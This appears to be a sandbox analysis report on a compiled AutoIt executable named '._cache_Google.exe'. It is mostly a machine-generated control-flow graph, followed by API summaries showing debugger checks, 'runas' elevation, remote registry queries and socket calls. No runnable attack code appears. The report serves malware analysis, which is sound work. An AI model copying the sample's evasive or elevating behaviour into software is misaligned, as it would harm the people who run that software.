103442 4cf4af 103439->103442 104858 4b5080 49 API calls 103439->104858 103441 526841 103440->103441 103443 4d297d __wsplitpath 47 API calls 103441->103443 103446 4b84a6 81 API calls 103442->103446 103445 526859 103443->103445 103447 4bcaee 48 API calls 103445->103447 103448 4cf4bf 103446->103448 103449 52686a 103447->103449 103450 4b4bf9 56 API calls 103448->103450 104859 4b39e8 48 API calls 2 library calls 103449->104859 103451 4cf4ce 103450->103451 103453 5268d4 GetLastError 103451->103453 103465 4cf4d6 103451->103465 103456 5268ed 103453->103456 103454 526878 103455 526895 103454->103455 104860 4f6f4b GetFileAttributesW FindFirstFileW FindClose 103454->104860 103457 4bcdb4 48 API calls 103455->103457 103456->103465 104861 4b4592 CloseHandle 103456->104861 103457->103461 103458 526920 103463 4d010a 48 API calls 103458->103463 103459 4cf4f0 103462 4d010a 48 API calls 103459->103462 103461->103438 103471 4cf50a Mailbox 103461->103471 103466 4cf4f5 103462->103466 103467 526925 103463->103467 103464 526888 103464->103455 103470 4f6d6d 52 API calls 103464->103470 103465->103458 103465->103459 103469 4b197e 48 API calls 103466->103469 103469->103471 103470->103455 103471->103108 103473 4bca8e 48 API calls 103472->103473 103474 5130ca 103473->103474 103475 4bd3d2 48 API calls 103474->103475 103476 5130d3 103475->103476 103477 4bd3d2 48 API calls 103476->103477 103478 5130dc 103477->103478 103479 4bd3d2 48 API calls 103478->103479 103480 5130e5 103479->103480 103481 4b84a6 81 API calls 103480->103481 103482 5130f4 103481->103482 103483 513d7b 48 API calls 103482->103483 103484 513128 103483->103484 103485 513af7 49 API calls 103484->103485 103486 513159 103485->103486 103487 51319c RegOpenKeyExW 103486->103487 103488 513172 RegConnectRegistryW 103486->103488 103497 51315d Mailbox 103486->103497 103490 5131c5 103487->103490 103491 5131f7 103487->103491 103488->103487 103488->103497 103494 5131d9 RegCloseKey 103490->103494 103490->103497 103492 4b84a6 81 API calls 
103491->103492 103493 513207 RegQueryValueExW 103492->103493 103495 513229 103493->103495 103496 51323e 103493->103496 103494->103497 103501 5134eb RegCloseKey 103495->103501 103496->103495 103498 513265 103496->103498 103499 51344c 103496->103499 103497->103108 103502 5133d9 103498->103502 103503 51326e 103498->103503 103500 4d010a 48 API calls 103499->103500 103504 513464 103500->103504 103501->103497 103505 5134fe RegCloseKey 103501->103505 104862 4fad14 48 API calls _memset 103502->104862 103507 513279 103503->103507 103508 51338d 103503->103508 103510 4b84a6 81 API calls 103504->103510 103505->103497 103512 5132de 103507->103512 103513 51327e 103507->103513 103509 4b84a6 81 API calls 103508->103509 103514 5133a1 RegQueryValueExW 103509->103514 103516 513479 RegQueryValueExW 103510->103516 103511 5133e4 103517 4b84a6 81 API calls 103511->103517 103515 4d010a 48 API calls 103512->103515 103513->103495 103520 4b84a6 81 API calls 103513->103520 103514->103495 103518 5132f7 103515->103518 103516->103495 103525 513331 103516->103525 103519 5133f6 RegQueryValueExW 103517->103519 103521 4b84a6 81 API calls 103518->103521 103519->103495 103519->103501 103522 51329f RegQueryValueExW 103520->103522 103523 51330c RegQueryValueExW 103521->103523 103522->103495 103523->103495 103523->103525 103524 4bca8e 48 API calls 103524->103495 103525->103524 104863 4cdd92 GetFileAttributesW 103526->104863 104868 506b19 103529->104868 103532 5080a5 103533 4b3320 48 API calls 103532->103533 103534 5080b3 103533->103534 104873 4c2320 50 API calls 103534->104873 103535 508102 103537 4bcdb4 48 API calls 103535->103537 103542 5080f5 103535->103542 103539 50812b 103537->103539 103538 5080cf 104874 4c2320 50 API calls 103538->104874 103541 4bcdb4 48 API calls 103539->103541 103539->103542 103541->103542 103542->103108 103544 4ba6d4 48 API calls 103543->103544 103545 5092d2 103544->103545 103546 4b84a6 81 API calls 103545->103546 103547 5092e1 103546->103547 103548 4cf26b 50 API calls 
103547->103548 103549 5092ed gethostbyname 103548->103549 103550 5092fa WSAGetLastError 103549->103550 103552 50931d _memmove 103549->103552 103551 50930e 103550->103551 103554 4bca8e 48 API calls 103551->103554 103553 50932d inet_ntoa 103552->103553 104875 50adca 48 API calls 2 library calls 103553->104875 103560 50931b Mailbox 103554->103560 103556 509342 104876 50ae5a 50 API calls 103556->104876 103558 50934e 104877 4b7bef 103558->104877 103560->103108 103562 4b19ee 83 API calls 103561->103562 103563 518062 103562->103563 103564 4b1dce 107 API calls 103563->103564 103565 51806b 103564->103565 103566 518091 103565->103566 103567 51806f 103565->103567 103568 4bd3d2 48 API calls 103566->103568 103569 4bca8e 48 API calls 103567->103569 103570 51809a 103568->103570 103574 51808f Mailbox 103569->103574 104883 4ee2e8 103570->104883 103572 5180aa 103573 4b7bef 48 API calls 103572->103573 103573->103574 103574->103108 103576 4bcdb4 48 API calls 103575->103576 103577 50938a 103576->103577 103578 4bcdb4 48 API calls 103577->103578 103579 50939a 103578->103579 103580 4bca8e 48 API calls 103579->103580 103581 5093a9 103580->103581 103582 5093c2 select 103581->103582 103599 5093ae Mailbox _memmove 103581->103599 103583 509414 WSAGetLastError 103582->103583 103584 50941f 103582->103584 103583->103599 103585 4d010a 48 API calls 103584->103585 103586 509428 103585->103586 103587 4b4bce 48 API calls 103586->103587 103588 509432 __WSAFDIsSet 103587->103588 103589 50944a #16 103588->103589 103588->103599 103590 509463 103589->103590 103591 5094f5 WSAGetLastError 103589->103591 103592 50947b _strlen 103590->103592 103593 4bcdb4 48 API calls 103590->103593 103590->103599 103591->103599 103594 5094be 103592->103594 103595 50948e 103592->103595 103593->103592 104929 4fad14 48 API calls _memset 103594->104929 104927 4ee0f5 48 API calls 2 library calls 103595->104927 103598 509497 104928 50ae5a 50 API calls 103598->104928 103599->103108 103601 5094a3 103602 4b7bef 48 API calls 
103601->103602 103602->103599 103604 500157 103603->103604 103605 50015e 103603->103605 103607 4b84a6 81 API calls 103604->103607 103606 4b84a6 81 API calls 103605->103606 103606->103604 103608 50017c 103607->103608 104930 4f76db GetFileVersionInfoSizeW 103608->104930 103610 50018d 103611 500192 103610->103611 103613 5001a3 _wcscmp 103610->103613 103612 4bca8e 48 API calls 103611->103612 103615 5001a1 103612->103615 103614 4bca8e 48 API calls 103613->103614 103614->103615 103615->103108 103617 4bca8e 48 API calls 103616->103617 103618 4cef25 103617->103618 103619 4cef3e 103618->103619 103620 4ceffb 103618->103620 104969 4cf0f3 48 API calls 103619->104969 103621 4d010a 48 API calls 103620->103621 103623 4cf002 103621->103623 103624 4cf00e 103623->103624 104971 4b5080 49 API calls 103623->104971 103628 4b84a6 81 API calls 103624->103628 103626 4cef4d 103627 4cef73 103626->103627 103630 526942 103626->103630 103631 4bcdb4 48 API calls 103626->103631 103629 4cf03e 2 API calls 103627->103629 103632 4cf01c 103628->103632 103633 4cef7a 103629->103633 103630->103108 103634 526965 103631->103634 103635 4b4bf9 56 API calls 103632->103635 103637 526980 103633->103637 103638 4cef87 103633->103638 103634->103627 103639 52696d 103634->103639 103636 4cf02b 103635->103636 103636->103626 103640 526936 103636->103640 103641 4d010a 48 API calls 103637->103641 103642 4bd3d2 48 API calls 103638->103642 103643 4bcdb4 48 API calls 103639->103643 103640->103630 104972 4b4592 CloseHandle 103640->104972 103644 526986 103641->103644 103645 4cef8f 103642->103645 103643->103633 103646 52699f 103644->103646 104973 4b3d65 ReadFile SetFilePointerEx 103644->104973 104946 4cf04e 103645->104946 103653 5269a3 _memmove 103646->103653 104974 4fad14 48 API calls _memset 103646->104974 103650 4cef9e 103652 4b7bef 48 API calls 103650->103652 103650->103653 103654 4cefb2 Mailbox 103652->103654 103655 4ceff2 103654->103655 103656 4b50ec CloseHandle 103654->103656 103655->103108 103657 4cefe4 103656->103657 
104970 4b4592 CloseHandle 103657->104970 103660 4cf0b5 2 API calls 103659->103660 103661 4cf046 103660->103661 103661->103108 103663 4b84a6 81 API calls 103662->103663 103664 50913f 103663->103664 103665 4bcdb4 48 API calls 103664->103665 103666 509149 103665->103666 104998 50acd3 103666->104998 103668 509156 103669 50915a socket 103668->103669 103673 509182 103668->103673 103670 509184 connect 103669->103670 103671 50916d WSAGetLastError 103669->103671 103672 5091a3 WSAGetLastError 103670->103672 103670->103673 103671->103673 105004 4fd7e4 103672->105004 103673->103108 103675 5091b8 closesocket 103675->103673 105019 50f79f 103676->105019 103678 510c0a 103678->103108 105094 5123c5 103679->105094 103683 4b84a6 81 API calls 103682->103683 103684 5110fb LoadLibraryW 103683->103684 103685 51111e 103684->103685 103686 51110f 103684->103686 103685->103686 105178 5128d9 48 API calls _memmove 103685->105178 103686->103108 103688->103108 103690 4bcafd __NMSG_WRITE _memmove 103689->103690 103691 4d010a 48 API calls 103690->103691 103692 4bcb3b 103691->103692 103692->103107 103693->103108 103694->103108 103695->103108 103696->103108 103697->103107 103698->103101 103699->103082 103700->103078 103701->103087 103702->103094 103835 4bd3d2 103703->103835 103705 50f389 Mailbox 103707 50f3e1 103705->103707 103708 50f3cd 103705->103708 103723 50f3a9 103705->103723 103706 4bd89e 50 API calls 103718 50f421 Mailbox 103706->103718 103710 4bc935 48 API calls 103707->103710 103846 4b7e53 103708->103846 103711 50f3df 103710->103711 103712 50f429 103711->103712 103855 50cdb5 420 API calls 103711->103855 103840 50cd12 103712->103840 103714 50f410 103714->103712 103716 50f414 103714->103716 103856 4fd338 86 API calls 4 library calls 103716->103856 103717 50f44b 103720 50f4a2 103717->103720 103722 50f457 103717->103722 103718->103266 103721 50f34f 420 API calls 103720->103721 103721->103718 103722->103723 103724 50f476 103722->103724 103723->103706 103725 4bca8e 48 API calls 103724->103725 
103725->103718 103726->103252 103727->103263 103728->103263 103729->103246 103730->103263 103731->103253 103732->103246 103733->103246 103734->103282 103735->103303 103737 4c469f 103736->103737 103738 4c4537 103736->103738 103741 4bcaee 48 API calls 103737->103741 103739 527820 103738->103739 103740 4c4543 103738->103740 104105 50e713 420 API calls Mailbox 103739->104105 103933 4c4040 103740->103933 103748 4c45e4 Mailbox 103741->103748 103744 52782c 103745 4c4639 Mailbox 103744->103745 104106 4fd520 86 API calls 4 library calls 103744->104106 103745->103266 103747 4c4559 103747->103744 103747->103745 103747->103748 103756 511f19 134 API calls 103748->103756 103948 509500 103748->103948 103957 4cf55e 103748->103957 103966 4fdce9 103748->103966 103971 5095af WSAStartup 103748->103971 103973 51352a 103748->103973 104061 506fc3 103748->104061 104064 4b50ec 103748->104064 104068 4fefcd 103748->104068 104102 501080 103748->104102 103756->103745 103759->103296 103760->103302 103761->103306 104655 4ba9a0 103762->104655 103764 4c36e7 103765 4c3778 103764->103765 103766 52a269 103764->103766 103821 4c3aa8 103764->103821 104667 4cbc04 86 API calls 103765->104667 104672 4fd520 86 API calls 4 library calls 103766->104672 103771 52a3e9 104677 4fd520 86 API calls 4 library calls 103771->104677 103772 4c3793 103772->103821 103823 4c396b Mailbox _memmove 103772->103823 103826 52a68d 103772->103826 104660 4b10e8 103772->104660 103773 4cbc5c 48 API calls 103773->103823 103777 52a583 103782 4bfa40 420 API calls 103777->103782 103778 52a45c 104681 4fd520 86 API calls 4 library calls 103778->104681 103779 52a289 103779->103771 103780 4bd2d2 53 API calls 103779->103780 103783 52a2fb 103780->103783 103784 52a5b5 103782->103784 103786 52a303 103783->103786 103787 52a40f 103783->103787 103790 4bd380 55 API calls 103784->103790 103784->103821 103800 52a317 103786->103800 103808 52a341 103786->103808 104678 4ccf79 49 API calls 103787->104678 103789 4c384e 103793 4c38e5 103789->103793 103794 
52a60c 103789->103794 103789->103823 103796 52a5e6 103790->103796 104685 4fd520 86 API calls 4 library calls 103796->104685 103797 4bfa40 420 API calls 103797->103823 103799 52a42c 104673 4fd520 86 API calls 4 library calls 103800->104673 103809 52a366 103808->103809 103813 52a384 103808->103813 104674 50f211 420 API calls 103809->104674 103810 4bd89e 50 API calls 103810->103823 103814 52a37a 103813->103814 104675 50f4df 420 API calls 103813->104675 103814->103821 103818 4c399f 103819 4bc935 48 API calls 103818->103819 103820 4c39c0 103818->103820 103819->103820 103820->103821 103825 52a65e 103820->103825 103830 4c3a05 103820->103830 103831 4c3ab5 Mailbox 103821->103831 104671 4fd520 86 API calls 4 library calls 103821->104671 103823->103773 103823->103777 103823->103778 103823->103779 103823->103796 103823->103797 103823->103810 103823->103818 103823->103821 103824 4d010a 48 API calls 103823->103824 104668 4bd500 53 API calls __cinit 103823->104668 104669 4bd420 53 API calls 103823->104669 104670 4cbaef 48 API calls _memmove 103823->104670 104682 50d21a 82 API calls Mailbox 103823->104682 104683 4f89e0 53 API calls 103823->104683 104684 4bd772 55 API calls 103823->104684 103824->103823 103827 4bd89e 50 API calls 103825->103827 103826->103821 104687 4fd520 86 API calls 4 library calls 103826->104687 103827->103826 103828 4c3a95 103829 4bd89e 50 API calls 103828->103829 103829->103821 103830->103821 103830->103826 103830->103828 103831->103266 103832->103266 103833->103281 103834->103287 103836 4d010a 48 API calls 103835->103836 103837 4bd3f3 103836->103837 103838 4d010a 48 API calls 103837->103838 103839 4bd401 103838->103839 103839->103705 103841 50cd21 103840->103841 103845 50cd46 103840->103845 103842 4bca8e 48 API calls 103841->103842 103843 50cd2d 103842->103843 103857 50c8b7 103843->103857 103845->103717 103847 4b7ecf 103846->103847 103849 4b7e5f __NMSG_WRITE 103846->103849 103925 4ba2fb 103847->103925 103850 4b7e7b 103849->103850 103851 4b7ec7 103849->103851 
103921 4ba6f8 103850->103921 103924 4b7eda 48 API calls 103851->103924 103854 4b7e85 _memmove 103854->103711 103855->103714 103856->103718 103859 50c914 103857->103859 103860 50c8f7 103857->103860 103915 50c235 420 API calls Mailbox 103859->103915 103860->103859 103861 50cc61 103860->103861 103862 50c934 103860->103862 103863 50cca9 103861->103863 103864 50cc6e 103861->103864 103862->103859 103893 4eabf3 103862->103893 103863->103859 103868 50ccb6 103863->103868 103911 4cd6b4 48 API calls 103864->103911 103866 50c964 103866->103859 103869 50c973 103866->103869 103913 4cd6b4 48 API calls 103868->103913 103879 50c9a1 103869->103879 103897 4ea8c8 103869->103897 103870 50cc87 103912 4f97b6 89 API calls 103870->103912 103874 50ccd6 103914 4f503c 91 API calls Mailbox 103874->103914 103876 50cadc VariantInit 103884 50cb11 _memset 103876->103884 103880 50ca4a 103879->103880 103907 4ea25b 106 API calls 103879->103907 103880->103876 103881 50ca86 VariantClear 103880->103881 103881->103880 103882 50caa5 SysAllocString 103881->103882 103882->103880 103890 50cc52 103890->103845 103894 4eac16 103893->103894 103895 4eac04 __NMSG_WRITE 103893->103895 103894->103866 103895->103894 103916 4b3bcf 103895->103916 103899 4ea8f2 103897->103899 103898 4ea9ed SysFreeString 103902 4ea9f9 103898->103902 103899->103898 103900 4eaa7e 103899->103900 103901 4ea90a 103899->103901 103899->103902 103900->103901 103900->103902 103901->103879 103902->103901 103907->103879 103911->103870 103912->103890 103913->103874 103914->103890 103915->103890 103917 4b3bd9 __NMSG_WRITE 103916->103917 103918 4d010a 48 API calls 103917->103918 103919 4b3bee _wcscpy 103918->103919 103919->103894 103922 4d010a 48 API calls 103921->103922 103923 4ba702 103922->103923 103923->103854 103924->103854 103926 4ba321 _memmove 103925->103926 103927 4ba309 103925->103927 103926->103854 103927->103926 103929 4bb8a7 103927->103929 103930 4bb8ba 103929->103930 103932 4bb8b7 _memmove 103929->103932 103931 4d010a 48 API calls 
103930->103931 103931->103932 103932->103926 103934 52787b 103933->103934 103937 4c406c 103933->103937 104108 4fd520 86 API calls 4 library calls 103934->104108 103936 52788c 104109 4fd520 86 API calls 4 library calls 103936->104109 103937->103936 103945 4c40a6 _memmove 103937->103945 103939 4c4175 103944 4c4185 103939->103944 104107 50d21a 82 API calls Mailbox 103939->104107 103941 4d010a 48 API calls 103941->103945 103942 4c41f1 103942->103747 103943 4bfa40 420 API calls 103943->103945 103944->103747 103945->103939 103945->103941 103945->103943 103945->103944 103946 5278d8 103945->103946 104110 4fd520 86 API calls 4 library calls 103946->104110 103949 4bcdb4 48 API calls 103948->103949 103950 509515 103949->103950 104111 4fbe47 103950->104111 103952 509522 103953 50952f send 103952->103953 103954 509546 103953->103954 103955 509552 WSAGetLastError 103954->103955 103956 50956a 103954->103956 103955->103956 103956->103745 103958 4bcdb4 48 API calls 103957->103958 103959 4cf572 103958->103959 103960 5275d1 Sleep 103959->103960 103961 4cf57a timeGetTime 103959->103961 103962 4bcdb4 48 API calls 103961->103962 103963 4cf590 103962->103963 104116 4be1f0 103963->104116 103967 4b84a6 81 API calls 103966->103967 103968 4fdcfc 103967->103968 104376 4f6d6d 103968->104376 103970 4fdd06 103970->103745 103972 5095e0 103971->103972 103972->103745 103974 4bd3d2 48 API calls 103973->103974 103975 51354a 103974->103975 103976 4bd3d2 48 API calls 103975->103976 103977 513553 103976->103977 103978 4bd3d2 48 API calls 103977->103978 103979 51355c 103978->103979 103980 4b84a6 81 API calls 103979->103980 103989 5135e9 Mailbox 103979->103989 103981 513580 103980->103981 104388 513d7b 103981->104388 103989->103745 104062 4b84a6 81 API calls 104061->104062 104063 506fd6 SetWindowTextW 104062->104063 104063->103745 104065 4b50f6 104064->104065 104066 4b5105 104064->104066 104065->103745 104066->104065 104067 4b510a CloseHandle 104066->104067 104067->104065 104069 4b84a6 81 API calls 
104068->104069 104070 4feff2 104069->104070 104453 4f78ad GetFullPathNameW 104070->104453 104075 4ff04b CoInitialize CoCreateInstance 104076 4ff08e 104075->104076 104077 4ff070 104075->104077 104079 4b84a6 81 API calls 104076->104079 104080 4ff07a CoUninitialize 104077->104080 104081 4ff09d 104079->104081 104082 4ff23c Mailbox 104080->104082 104082->103745 104469 5022e5 104102->104469 104104 501090 104104->103745 104105->103744 104106->103745 104107->103942 104108->103936 104109->103944 104110->103944 104112 4fbe55 104111->104112 104113 4fbe50 104111->104113 104112->103952 104115 4fae06 50 API calls 2 library calls 104113->104115 104115->104112 104117 4be216 104116->104117 104177 4be226 Mailbox 104116->104177 104119 4be670 104117->104119 104117->104177 104118 4fd520 86 API calls 104118->104177 104246 4cecee 420 API calls 104119->104246 104121 4be4e7 104123 4be4fd 104121->104123 104247 4b322e 16 API calls 104121->104247 104123->103745 104124 4be681 104124->104123 104126 4be68e 104124->104126 104125 4be26c PeekMessageW 104125->104177 104248 4cec33 420 API calls Mailbox 104126->104248 104128 525b13 Sleep 104128->104177 104129 4be695 LockWindowUpdate DestroyWindow GetMessageW 104129->104123 104131 4be6c7 104129->104131 104135 4be657 PeekMessageW 104135->104177 104136 4be517 timeGetTime 104136->104177 104138 4bc935 48 API calls 104138->104177 104139 4be641 TranslateMessage DispatchMessageW 104139->104135 104140 4d010a 48 API calls 104140->104177 104141 525dfc WaitForSingleObject 104144 525e19 GetExitCodeProcess CloseHandle 104141->104144 104141->104177 104142 4bd3d2 48 API calls 104173 525cce Mailbox 104142->104173 104143 526147 Sleep 104143->104173 104144->104177 104145 4be6cc timeGetTime 104249 4ccf79 49 API calls 104145->104249 104148 525feb Sleep 104148->104177 104151 4b1000 396 API calls 104151->104177 104153 5261de GetExitCodeProcess 104156 5261f4 WaitForSingleObject 104153->104156 104157 52620a CloseHandle 104153->104157 104155 525cea Sleep 104155->104177 
104156->104157 104156->104177 104157->104173 104158 525cd7 Sleep 104158->104155 104159 518a48 108 API calls 104159->104173 104160 4b1dce 107 API calls 104160->104177 104162 526266 Sleep 104162->104177 104163 4ccf79 49 API calls 104163->104177 104166 4bcaee 48 API calls 104166->104173 104168 4bfa40 396 API calls 104168->104177 104169 4bd380 55 API calls 104169->104173 104171 4c44e0 396 API calls 104171->104177 104172 4c3680 396 API calls 104172->104177 104173->104142 104173->104153 104173->104155 104173->104158 104173->104159 104173->104162 104173->104166 104173->104169 104173->104177 104251 4f56dc 49 API calls Mailbox 104173->104251 104252 4ccf79 49 API calls 104173->104252 104253 4b1000 420 API calls 104173->104253 104255 50d12a 50 API calls 104173->104255 104256 4f8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104173->104256 104257 4ce3a5 timeGetTime 104173->104257 104258 4f6f5b CreateToolhelp32Snapshot Process32FirstW 104173->104258 104175 4bd380 55 API calls 104175->104177 104176 4bcaee 48 API calls 104176->104177 104177->104118 104177->104121 104177->104125 104177->104128 104177->104135 104177->104136 104177->104138 104177->104139 104177->104140 104177->104141 104177->104143 104177->104145 104177->104148 104177->104151 104177->104155 104177->104160 104177->104163 104177->104168 104177->104171 104177->104172 104177->104173 104177->104175 104177->104176 104178 4be7e0 104177->104178 104185 4bea00 104177->104185 104235 4cf381 104177->104235 104240 4ced1a 104177->104240 104245 4be7b0 420 API calls Mailbox 104177->104245 104250 518b20 48 API calls 104177->104250 104254 4ce3a5 timeGetTime 104177->104254 104179 4be80f 104178->104179 104180 4be7fd 104178->104180 104296 4fd520 86 API calls 4 library calls 104179->104296 104265 4bdcd0 104180->104265 104183 4be806 104183->104177 104184 5298e8 104184->104184 104186 4bea20 104185->104186 104187 4bfa40 420 API calls 104186->104187 104192 4bea89 104186->104192 104189 529919 
106675->106639 106676->106639 106677->106640 106678->106609 106679->106616 106680->106608 106681->106618 106682->106626 106683->106667 106684 52984d 106687 4b5577 106684->106687 106686 529859 106686->106686 106688 4b55bc 106687->106688 106689 5278fd 106687->106689 106691 4bd3d2 48 API calls 106688->106691 106689->106688 106690 527906 106689->106690 106708 50d443 420 API calls Mailbox 106690->106708 106707 4b55c4 106691->106707 106693 4bc935 48 API calls 106693->106707 106694 4b576b Mailbox 106694->106686 106696 4bca8e 48 API calls 106696->106707 106697 4bd380 55 API calls 106697->106707 106698 4bd2d2 53 API calls 106698->106707 106699 4bfa40 420 API calls 106699->106707 106700 4bcdb4 48 API calls 106700->106707 106702 4bd89e 50 API calls 106702->106707 106703 4b346e 48 API calls 106703->106707 106704 50d154 48 API calls 106704->106707 106705 4b57c4 106710 4fd520 86 API calls 4 library calls 106705->106710 106706 4b3320 48 API calls 106706->106707 106707->106693 106707->106694 106707->106696 106707->106697 106707->106698 106707->106699 106707->106700 106707->106702 106707->106703 106707->106704 106707->106705 106707->106706 106709 4b203a 420 API calls 106707->106709 106708->106694 106709->106707 106710->106705 106711 521eed 106716 4ce975 106711->106716 106713 521f01 106732 4d1b2a 52 API calls __cinit 106713->106732 106715 521f0b 106717 4d010a 48 API calls 106716->106717 106718 4cea27 GetModuleFileNameW 106717->106718 106719 4d297d __wsplitpath 47 API calls 106718->106719 106720 4cea5b _wcsncat 106719->106720 106733 4d2bff 106720->106733 106723 4d010a 48 API calls 106724 4cea94 _wcscpy 106723->106724 106725 4bd3d2 48 API calls 106724->106725 106726 4ceacf 106725->106726 106736 4ceb05 106726->106736 106728 4ceae0 Mailbox 106728->106713 106729 4d010a 48 API calls 106730 4ceada _wcscat __NMSG_WRITE _wcsncpy 106729->106730 106730->106728 106730->106729 106731 4ba4f6 48 API calls 106730->106731 106731->106730 106732->106715 106750 4daab9 106733->106750 106737 4bc4cd 48 
API calls 106736->106737 106738 4ceb14 RegOpenKeyExW 106737->106738 106739 524b17 RegQueryValueExW 106738->106739 106740 4ceb35 106738->106740 106741 524b30 106739->106741 106742 524b91 RegCloseKey 106739->106742 106740->106730 106743 4d010a 48 API calls 106741->106743 106744 524b49 106743->106744 106745 4b4bce 48 API calls 106744->106745 106746 524b53 RegQueryValueExW 106745->106746 106747 524b86 106746->106747 106748 524b6f 106746->106748 106747->106742 106749 4b7e53 48 API calls 106748->106749 106749->106747 106751 4daaca 106750->106751 106752 4dabc6 106750->106752 106751->106752 106758 4daad5 106751->106758 106760 4d889e 47 API calls __getptd_noexit 106752->106760 106755 4cea8a 106755->106723 106757 4dabbb 106761 4d7aa0 8 API calls __gmtime64_s 106757->106761 106758->106755 106759 4d889e 47 API calls __getptd_noexit 106758->106759 106759->106757 106760->106757 106761->106755

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 004B376D
                                                                                                                                                                                • Part of subcall function 004B4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00000000,00000001,00000000), ref: 004B428C
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?), ref: 004B377F
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00571120,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00571124,?,?), ref: 004B37EE
                                                                                                                                                                                • Part of subcall function 004B34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004B352A
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004B3860
                                                                                                                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00562934,00000010), ref: 005221C5
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?), ref: 005221FD
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00522232
                                                                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0054DAA4), ref: 00522290
                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00522297
                                                                                                                                                                                • Part of subcall function 004B30A5: GetSysColorBrush.USER32(0000000F), ref: 004B30B0
                                                                                                                                                                                • Part of subcall function 004B30A5: LoadCursorW.USER32(00000000,00007F00), ref: 004B30BF
                                                                                                                                                                                • Part of subcall function 004B30A5: LoadIconW.USER32(00000063), ref: 004B30D5
                                                                                                                                                                                • Part of subcall function 004B30A5: LoadIconW.USER32(000000A4), ref: 004B30E7
                                                                                                                                                                                • Part of subcall function 004B30A5: LoadIconW.USER32(000000A2), ref: 004B30F9
                                                                                                                                                                                • Part of subcall function 004B30A5: RegisterClassExW.USER32(?), ref: 004B3167
                                                                                                                                                                                • Part of subcall function 004B2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004B2ECB
                                                                                                                                                                                • Part of subcall function 004B2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B2EEC
                                                                                                                                                                                • Part of subcall function 004B2E9D: ShowWindow.USER32(00000000), ref: 004B2F00
                                                                                                                                                                                • Part of subcall function 004B2E9D: ShowWindow.USER32(00000000), ref: 004B2F09
                                                                                                                                                                                • Part of subcall function 004B3598: _memset.LIBCMT ref: 004B35BE
                                                                                                                                                                                • Part of subcall function 004B3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004B3667
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\._cache_Google.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"W
                                                                                                                                                                              • API String ID: 4253510256-3084681909
                                                                                                                                                                              • Opcode ID: 46b2ceba2873f6087c65bcd673a0d97df7d9f3d657c6f49684c3898d7687cad6
                                                                                                                                                                              • Instruction ID: 883924b4ebd2404bbc56d33ff6c485ab78a2a58faf97bb5c1a184cd201498bb8
                                                                                                                                                                              • Opcode Fuzzy Hash: 46b2ceba2873f6087c65bcd673a0d97df7d9f3d657c6f49684c3898d7687cad6
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A512D74604144BBCB10BFA6BC46FED3FB4AB25705F00005BF64596191CA744A89FB7E

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051317F
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0051321E
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005132B6
                                                                                                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 005134F5
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00513502
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
